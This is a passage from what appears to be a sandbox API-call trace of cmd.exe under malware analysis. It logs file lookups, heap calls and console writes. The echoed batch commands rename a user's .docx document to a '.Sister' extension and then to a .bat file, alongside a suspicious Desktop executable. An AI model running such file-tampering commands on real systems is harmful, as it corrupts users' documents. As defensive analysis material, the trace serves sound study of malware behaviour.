hFindFile=0x21ed8cc7180) returned 1 [0304.893] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7c60 [0304.894] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0304.894] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe04cc2d5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe04cc2d5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc7300 [0304.894] FindClose (in: hFindFile=0x21ed8cc7300 | out: hFindFile=0x21ed8cc7300) returned 1 [0304.894] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.894] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\N8giE.docx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaccf30, ftCreationTime.dwHighDateTime=0x1d56990, ftLastAccessTime.dwLowDateTime=0xdb8ed1b0, ftLastAccessTime.dwHighDateTime=0x1d56da1, ftLastWriteTime.dwLowDateTime=0xdb8ed1b0, ftLastWriteTime.dwHighDateTime=0x1d56da1, nFileSizeHigh=0x0, nFileSizeLow=0x18e16, dwReserved0=0x4, dwReserved1=0x7, cFileName="N8giE.docx", cAlternateFileName="N8GIE~1.DOC")) returned 0x21ed8cc79c0 [0304.894] FindClose (in: hFindFile=0x21ed8cc79c0 | out: hFindFile=0x21ed8cc79c0) returned 1 [0304.894] _wcsnicmp (_String1="N8GIE~1.DO", _String2="N8giE.docx", _MaxCount=0xa) returned 80 [0304.894] malloc (_Size=0x1ff9c) returned 0x21eda21fdc0 [0304.896] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.897] GetProcessHeap () returned 0x21ed8c70000 [0304.897] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45d70 [0304.897] ??_V@YAXPEAX@Z () returned 0x1 [0304.897] ??_V@YAXPEAX@Z () returned 0x1 [0304.897] GetProcessHeap () returned 0x21ed8c70000 [0304.897] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b510, Size=0x118) returned 0x21ed8d2b510 [0304.897] GetProcessHeap () returned 0x21ed8c70000 [0304.897] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b510) returned 0x118 [0304.897] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.897] GetFileType (hFile=0x50) returned 0x2 [0304.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.897] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.898] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.903] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.903] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.903] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.903] GetFileType (hFile=0x50) returned 0x2 [0304.903] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.903] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.905] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.906] GetFileType (hFile=0x50) returned 0x2 [0304.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.906] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.906] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2b0d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2b0d0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.907] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"N8giE.docx\" \"N8giE.docx.Sister\" ") returned 34 [0304.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.907] GetFileType (hFile=0x50) returned 0x2 [0304.907] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.907] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.908] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x22) returned 1 [0304.908] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.908] GetFileType (hFile=0x50) returned 0x2 [0304.908] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.908] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.909] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.910] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.910] GetFileType (hFile=0x50) returned 0x2 [0304.910] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.910] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.914] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.915] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.915] GetFileType (hFile=0x50) returned 0x2 [0304.915] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.915] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.915] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.916] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.916] GetFileType (hFile=0x50) returned 0x2 [0304.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.916] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.916] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.921] GetFileType (hFile=0x50) returned 0x2 [0304.921] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.921] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.922] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2b4e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2b4e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.925] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"N8giE.docx.Sister\" \"N8giE.bat\" ") returned 33 [0304.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.925] GetFileType (hFile=0x50) returned 0x2 [0304.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.925] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.925] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x21) returned 1 [0304.926] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0304.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.926] GetFileType (hFile=0x50) returned 0x2 [0304.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.926] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.927] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.932] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.932] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.932] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.932] malloc (_Size=0xffce) returned 0x21eda21fdc0 [0304.932] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.932] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.932] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.933] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.933] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.933] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.933] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.933] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.933] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.933] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.933] ??_V@YAXPEAX@Z () returned 0x1 [0304.933] GetProcessHeap () returned 0x21ed8c70000 [0304.933] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed8d451c0 [0304.933] GetProcessHeap () returned 0x21ed8c70000 [0304.933] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d451c0, Size=0x54) returned 0x21ed8cc7f60 [0304.933] GetProcessHeap () returned 0x21ed8c70000 [0304.933] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc7f60) returned 0x54 [0304.933] GetProcessHeap () returned 0x21ed8c70000 [0304.933] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x5c) returned 0x21ed8d63d20 [0304.933] GetProcessHeap () returned 0x21ed8c70000 [0304.933] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed8d44fe0 [0304.933] GetProcessHeap () returned 0x21ed8c70000 [0304.933] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44fe0, Size=0x54) returned 0x21ed8cc7120 [0304.934] GetProcessHeap () returned 0x21ed8c70000 [0304.934] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc7120) returned 0x54 [0304.934] malloc (_Size=0xffce) returned 0x21eda21fdc0 [0304.934] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.934] GetProcessHeap () returned 0x21ed8c70000 [0304.934] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7d80 [0304.934] GetProcessHeap () returned 0x21ed8c70000 [0304.934] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c9b0 [0304.934] _wcsicmp (_String1="N8giE.docx", _String2=".") returned 64 [0304.934] _wcsicmp (_String1="N8giE.docx", _String2="..") returned 64 [0304.934] GetFileAttributesW (lpFileName="N8giE.docx" (normalized: "c:\\users\\fd1hvy\\documents\\n8gie.docx")) returned 0x20 [0304.935] GetProcessHeap () returned 0x21ed8c70000 [0304.935] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92f0010 [0304.936] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92f0020 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.936] SetErrorMode (uMode=0x0) returned 0x0 [0304.936] SetErrorMode (uMode=0x1) returned 0x0 [0304.936] GetFullPathNameW (in: lpFileName="N8giE.docx", nBufferLength=0x7fe7, lpBuffer=0x21eda21fdc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\N8giE.docx", lpFilePart=0xa6cf4fd660*="N8giE.docx") returned 0x24 [0304.936] SetErrorMode (uMode=0x0) returned 0x1 [0304.936] GetProcessHeap () returned 0x21ed8c70000 [0304.936] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a790 [0304.936] _wcsicmp (_String1="N8giE.docx", _String2=".") returned 64 [0304.936] _wcsicmp (_String1="N8giE.docx", _String2="..") returned 64 [0304.936] GetFileAttributesW (lpFileName="N8giE.docx" (normalized: "c:\\users\\fd1hvy\\documents\\n8gie.docx")) returned 0x20 [0304.937] ??_V@YAXPEAX@Z () returned 0x1 [0304.937] malloc (_Size=0xffce) returned 0x21eda21fdc0 [0304.937] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.937] malloc (_Size=0xffce) returned 0x21eda22fda0 [0304.937] ??_V@YAXPEAX@Z () returned 0x21eda22fda0 [0304.941] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\N8giE.docx" (normalized: "c:\\users\\fd1hvy\\documents\\n8gie.docx")) returned 0x20 [0304.941] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.941] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.941] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\N8giE.docx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5c9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5c9c0) returned 0x21ed8cc7060 [0304.941] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.941] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.941] ??_V@YAXPEAX@Z () returned 0x1 [0304.941] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\N8giE.docx" (normalized: "c:\\users\\fd1hvy\\documents\\n8gie.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\N8giE.docx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\n8gie.docx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0304.942] FindNextFileW (in: hFindFile=0x21ed8cc7060, lpFindFileData=0x21ed8d5c9c0 | out: lpFindFileData=0x21ed8d5c9c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaccf30, ftCreationTime.dwHighDateTime=0x1d56990, ftLastAccessTime.dwLowDateTime=0xdb8ed1b0, ftLastAccessTime.dwHighDateTime=0x1d56da1, ftLastWriteTime.dwLowDateTime=0xdb8ed1b0, ftLastWriteTime.dwHighDateTime=0x1d56da1, nFileSizeHigh=0x0, nFileSizeLow=0x18e16, dwReserved0=0x0, dwReserved1=0x0, cFileName="N8giE.docx", cAlternateFileName="")) returned 0 [0304.944] GetLastError () returned 0x12 [0304.944] FindClose (in: hFindFile=0x21ed8cc7060 | out: hFindFile=0x21ed8cc7060) returned 1 [0304.944] ??_V@YAXPEAX@Z () returned 0x1 [0304.944] ??_V@YAXPEAX@Z () returned 0x1 [0304.944] ??_V@YAXPEAX@Z () returned 0x1 [0304.944] ??_V@YAXPEAX@Z () returned 0x1 [0304.944] GetProcessHeap () returned 0x21ed8c70000 [0304.944] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7960 [0304.944] GetProcessHeap () returned 0x21ed8c70000 [0304.944] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95680, Size=0x16) returned 0x21ed8c95500 [0304.944] GetProcessHeap () returned 0x21ed8c70000 [0304.944] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95500) returned 0x16 [0304.944] GetProcessHeap () returned 0x21ed8c70000 [0304.944] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45bf0, Size=0x20) returned 0x21ed8d45bc0 [0304.944] GetProcessHeap () returned 0x21ed8c70000 [0304.944] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45bc0) returned 0x20 [0304.945] GetProcessHeap () returned 0x21ed8c70000 [0304.945] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61920 [0304.945] GetProcessHeap () returned 0x21ed8c70000 [0304.945] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61920, Size=0xb2) returned 0x21ed93b5df0 [0304.945] GetProcessHeap () returned 0x21ed8c70000 [0304.945] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b5df0) returned 0xb2 [0304.945] GetProcessHeap () returned 0x21ed8c70000 [0304.945] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b640 [0304.945] GetProcessHeap () returned 0x21ed8c70000 [0304.945] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b640, Size=0x30) returned 0x21ed8d2b640 [0304.945] GetProcessHeap () returned 0x21ed8c70000 [0304.945] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b640) returned 0x30 [0304.945] GetProcessHeap () returned 0x21ed8c70000 [0304.945] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b680 [0304.945] malloc (_Size=0x1ff9c) returned 0x21eda21fdc0 [0304.946] GetProcessHeap () returned 0x21ed8c70000 [0304.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b6330 [0304.946] GetProcessHeap () returned 0x21ed8c70000 [0304.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b4fb0 [0304.946] ??_V@YAXPEAX@Z () returned 0x1 [0304.946] malloc (_Size=0x1ff9c) returned 0x21eda21fdc0 [0304.946] GetProcessHeap () returned 0x21ed8c70000 [0304.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b5eb0 [0304.946] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda21fdc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.946] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7600 [0304.946] FindClose (in: hFindFile=0x21ed8cc7600 | out: hFindFile=0x21ed8cc7600) returned 1 [0304.946] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc79c0 [0304.947] FindClose (in: hFindFile=0x21ed8cc79c0 | out: hFindFile=0x21ed8cc79c0) returned 1 [0304.947] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc79c0 [0304.947] FindClose (in: hFindFile=0x21ed8cc79c0 | out: hFindFile=0x21ed8cc79c0) returned 1 [0304.947] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.947] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.947] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.947] GetProcessHeap () returned 0x21ed8c70000 [0304.948] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67530 [0304.948] ??_V@YAXPEAX@Z () returned 0x1 [0304.948] ??_V@YAXPEAX@Z () returned 0x1 [0304.948] GetProcessHeap () returned 0x21ed8c70000 [0304.948] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b680, Size=0x490) returned 0x21ed8d2b680 [0304.948] GetProcessHeap () returned 0x21ed8c70000 [0304.948] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b680) returned 0x490 [0304.948] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.948] GetFileType (hFile=0x50) returned 0x2 [0304.948] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.948] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.949] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.957] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.957] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.957] _vsnwprintf (in: _Buffer=0x21ed8e80192, 